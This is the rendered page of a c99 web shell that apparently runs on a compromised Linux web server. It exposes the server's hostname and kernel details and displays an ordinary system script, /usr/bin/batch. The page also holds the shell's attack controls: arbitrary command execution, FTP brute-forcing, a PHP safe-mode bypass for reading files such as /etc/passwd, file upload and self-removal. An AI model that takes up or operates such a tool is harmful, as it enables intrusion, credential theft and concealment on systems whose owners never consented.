!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/bin/   drwxr-xr-x
Free 52.29 GB of 127.8 GB (40.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     batch (975 B)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#! /bin/sh
prefix=/usr
exec_prefix=/usr

# Set defaults
OPT_f=""
OPT_m=""
OPT_q="-q b"
OPT_v=""
OPT_V=""
time_date_arg="now"

# Note that we use `"$@"' to let each command-line parameter expand to a 
# separate word. The quotes around `$@' are essential!
# We need TEMP as the `eval set --' would nuke the return value of getopt.
TEMP=`/usr/bin/getopt 'f:mq:vV' "$@"`

if [ $? != 0 ] ; then
    echo "batch: error parsing command-line arguments" >&2
    exit 1
fi

# Note the quotes around `$TEMP': they are essential!
eval set -- "$TEMP"

while true ; do
    case "$1" in
        -f) OPT_f="-f $2" ; shift 2 ;;
        -m) OPT_m="-m"; shift ;;
        -q) OPT_q="-q $2"; shift 2 ;;
        -v) OPT_v="-v"; shift ;;
        -V) OPT_V="-V"; shift ;;
        --) shift ; break ;;
        *) echo "batch: internal parsing error" >&2 ; exit 1 ;;
    esac
done

if [ ! -z "$*" ] ; then
    time_date_arg="$*"
fi

exec /usr/bin/at $OPT_f $OPT_m $OPT_q $OPT_v $OPT_V $time_date_arg

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0059 ]--